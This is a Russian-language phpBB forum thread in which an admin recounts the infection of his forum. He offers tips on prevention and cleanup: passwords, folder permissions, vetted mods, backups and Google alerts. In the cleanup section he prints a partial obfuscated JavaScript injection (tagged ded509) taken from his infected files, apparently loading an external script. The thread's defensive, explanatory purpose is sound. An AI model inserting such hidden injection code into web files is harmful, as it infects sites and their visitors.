Полезная информация


----

Начать новую тему Ответить на тему
АвторСообщение

 Сообщение Трояны и phpbb3 2013-05-01

Аватар пользователя

Всем доброго времени суток. Каждый день ломаю голову, думаю чего бы еще интересного вам рассказать на основе личного опыта. В свете недавнешних событий, решил что можно порассуждать о троянских вирусах (хотя не знаю почему повелось так называть заражение, ведь вроде ПК-ные троянцы тырят личные данные, а сайтовые - врядли). Собственно начнем ....

Многие из вас частенько натыкались в интернете на сайты, которые были поражены вирусами, при посещении которых антивирус начинал истошно вопить. Натыкался на такие и я, думал мол, как так админы допустили это (ну конечно есть определенный процент сайтов, созданных специально для рассады заразы). Думал меня пронесет, все вроде защищено... Ан нет, в истории нашего форума произошло 2 заражения. Первое - очень легкое, заражены были только JS-файлы, а может я вовремя заглянул и закрыл очаг. Второе же, недавнешнее - очень жесткое. Почти 60% файлов были заражены, а это и php-, html-, JS-файлы + перенаправление на какой то трейдерский сайт. Потратив день, сумел все же восстановить форум. Дело это конечно неприятное, но зато получил своеобразный опыт, да и бекап форума сделал наконец то полный :hi_hi_hi:

Так что ребята, никогда не расслабляйтесь, беда может и вас постигнуть.... Давайте подумаем, а чем же можно уберечься от подобных ситуаций ?

1. Пароли к панели хостинга и ФТП
- Это основное и самое больное место всех без исключения. Вам главное понять, что каким бы ни был начальный пароль, данный вам хостером - он рано или поздно будет взломан. Почему ? Да потому, что ни у одного хостера я не видел задержки на безошибочный ввод пароля. Иными словами, если ктото задастся целью ломануть пароль - его ничто не остановит. Пароль можно подбирать бесконечно долго, таймаутов на ввод неправильного пароля нет нигде. Собственно первоочередная ваша задача - смена дефолтных паролей доступа на более сложные, я бы даже рекомендовал делать пароли максимально длинными. Составляйте их таким образом, чтобы логика напрочь отсутствовала, брякните по клаве на 20 знаков пароль с цифрами и буквами. Чем длинней пароль - тем дольше его подбирать, у взломщика может попросту кончиться терпение.

2. Доступы на папки сервера
- Это такая вещь, стоящая на одном уровне с первым пунктом. Возможно даже выше. Тут главное понять что злоумышленникам иногда и не надо подбирать пароли. Если у вас на сервере есть хоть одна папка с открытым доступом (права наверное 777), то вам несдобровать. Банально заливается шелл и в течении пары часов ваш форум заражен. Так что не лепите тысячи папок на ФТП, делайте только нужные и настраивайте к ним нормальные права доступа.

3. Проверенные модификации и скрипты
- Раз уж говорим о наших форумах, то нужно помнить и об этом пункте. Собственно вас могут подкупить красивым названием и описанием мода(скрипта), а уж внутри него будет настоящий троянчик или уязвимость. Так что советую ставить только моды, прошедшие валидацию на оффоруме. Ставить моды, которые вам необходимы, а не потому что у большинства они стоят. Такое же дело и со скриптами. Перед их установкой внимательно читайте описание, комменты, просмотрите код скриптов, если чтото покажется подозрительным - лучше спросить у знающих людей.

4. Частые и полные бекапы форума.
- Способ пассивной защиты, писать особо тут нечего. Логика проста - если вы делаете частые полные бекапы форума, то при заражении файлов, вам потребуется всего лишь заново залить файлики с заменой (ну разумеется пароли поменять от хостинга).

5. Панель вебмастера Гугл
- Этот инструмент весьма полезен. Почему не яндекс ? Потому что яндекс не умеет кое чего. Представим себе такую ситуацию - вам необходимо отлучиться от форума на достаточно большой срок, доступ у вас есть только к почте, а за это время ваш форум все же заразили. Так вот, с задержкой в 5-6 часов вам придет на мыло письмецо от Гугла, мол заражен ваш форум. Очень полезная вещь, ведь никто не знает наверняка когда форум может быть заражен, а так вы получите уведомление и наиболее быстро среагируете на аварию. Собственно, не ленитесь и добавляйте свой форум в панель вебмастера Гугла

Со способами защиты мы ознакомились, теперь подумаем над вашими действиями в том случае если все же получили заражение ....

Раз уж вы читаете данную статью, то наверняка после прочтения добавите наконец то свой форум в Гугл :hi_hi_hi:
Так вот, либо сами замечаете недовольство антивируса на ваш форум либо получаете письмецо от Гугла, тут главное не паниковать, не делать опрометчивых действий. Расслабьтесь и начинайте по пунктам...

1. Отключение форума на уровне хостинга
- Такая функция должна быть у каждого хостера. Тут же вам надо отключить работу вашего домена, дабы прекратить издевательство над пользователями (заодно и возможно остановить процесс распространения заражения). Не бойтесь этого делать, ФТП доступ у вас то будет.

2. Смена паролей
- Очевидное решение - поменяйте пароли всех доступов на хостинг - панель, ФТП, может еще чего. Таким действием отрубим потенциального злоумышленника от файлов.

3. Работа с файлами форума
- Есть актуальный бекап ? Восстанавливаем. Нет ? Скачиваем абсолютно все файлы форума себе на компьютер и через Нотепад ++ смотрим сначала все JS файлы. Они заражаются в первую очередь, потом уж остальные. Смотрим код скриптов на наличие совершенно лишних участков, к примеру у меня был такой код (он разумеется не полный)
<!--ded509--> catch(q){a=1}if(!a){try{document["\x62ody"]^=~1;}catch(q){a2="_"}z="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_77_27_
44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_
74__30_42_14_11_14_11_27_27_27_27_77_35_7a_79_6a_27_44_27_2e_6f_7b_7
b_77_41_36_36_6a_68_6a_68_6d_73_7c_77_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_77_35_7a_7
b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73
_7c_7b_6c_2e_42_14_11_27_27_27_27_77
__63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27
_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80
_50_6b_2f_2e_77_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_77_30_42_
14_11_27_27_27_27_84_14_11_84_30_2f_30_42""split"}</script><!--/ded509-->
 

Ну очень такое бросается в глаза. Плюс, проблема всех таких вставок - код везде абсолютно одинаков. Значит открываем блокнот и идем в поиск по файлам, для начала вбиваем весь кусок вредоносного кода и выбираем опцию удаления найденного. Потом берем выдающуюся часть, у себя я взял ded509 и еще раз вбиваем это в поиск по файлам для успокоения совести (а вдруг все же вставка разная есть). После этого визуально осматриваем папки форума на наличие новых и непонятных папок с файлами, удаляем подозрительное. Потом для чистоты эксперимента сканируем все файлы антивирем и заливаем все обратно на ФТП с обязательной заменой.

4. Завершающий этап
- Активируем работу домена, смотрим на адекватную работу форума, антивирь молчит. Все хорошо, идем в панель хостинга и смотрим лог работ с папками за ближайшие 24 часа. Нам надо выловить момент заражения и понять - ломанули ли пароль иль шелл залили, делаем необходимые выводы. В панели вебмастера Гугла отправляем форум на перепроверку и в течении 24 часов ваш форум полностью разблокируется в Гугле и продолжит свою работу на благо общества :hi_hi_hi:

Впринципе наверное все написал что и хотел. Сами видите, дело одновременно и сложное и простое это. Надеюсь вас не постигнет такая беда, а если что - у вас есть маленькое руководство к действию, можете и мне в личку стукнуть, помогу если будет завал. Всем безоблачной работы ваших форумов :ya_hoo_oo:

ЗЫ. Может у кого есть еще советы? Пишите, не стесняйтесь, составим руководство вместе :ras_pal_cov_ka:


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!

Теги темы
Трояны и phpbb3
          Вернуться наверх  
 


Аватар пользователя

Просто не люблю когда лишний раз к моему форуму идут обращения со сторонних сайтов, да и вообще не приемлю я любую связь форума и других ресурсов, ну кроме контакта - он будет жить вечно, а так иногда я даже банально тырю скрипты дабы не ссылаться на другие сайты


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 


Аватар пользователя

Честно говоря, не понимаю в чём проблема. Где собака порылась?


          Вернуться наверх  
 


Аватар пользователя

Ну это мой личный заскок))Необьяснимо)


_________________
Подпись:
-_- -_-
На вопросы, связанные с phpBB, по ЛС не отвечаю !!!
          Вернуться наверх  
 
 
Начать новую тему Ответить на тему


Дополнительные возможности

  Похожие темы  Автор  Ответов  Просмотров  Последнее сообщение 
Аватар пользователя SQL ERROR phpbb3
В данной теме я буду рассматривать всевозможные ошибки Базы Данных и пути решения проблем

DeaDRoMeO

0

428

Аватар пользователя

08 окт 2011, 18:51

DeaDRoMeO

Аватар пользователя Сео-оптимизация phpbb3
Статья посвящена небольшой сео-оптимизации форума, эти правки нужно выполнить всем админам, заботящимся о хорошей выдаче

DeaDRoMeO

362

27977

Аватар пользователя

09 мар 2017, 15:39

DeaDRoMeO

Аватар пользователя NV who was here phpbb3 ? - Кто был на форуме ?
NV who was here phpbb3 ? - модификация добавляет на форум phpbb3 новый информационный блок, содержащий в себе полный список тех, кто был на форуме за день

DeaDRoMeO

52

7341

Аватар пользователя

05 фев 2015, 16:13

DeaDRoMeO

Аватар пользователя BB3Topics phpbb3
BB3Topics - модификация для phpbb3, добавляющая блок на главную страницу форума со следущим содержимым - Новые темы, Последние обьявления, Популярные темы, Обсуждаемые темы, Случайные темы, Темы с опросами

DeaDRoMeO

96

10336

Аватар пользователя

05 мар 2017, 18:36

DeaDRoMeO

Аватар пользователя Who Views Who phpbb3
Who Views Who - модификация для phpbb3, которая немного расширит информацию предоставляемую на странице Кто Онлайн

DeaDRoMeO

8

2539

Аватар пользователя

30 сен 2013, 20:27

DeaDRoMeO

Оставить свой комментарий

Поделиться темой с помощью

Ссылки на тему

Прямая ссылка:
BB-код для форумов, сайтов, блогов:
HTML ссылка:
 


Самая неформальная поддержка phpBB :P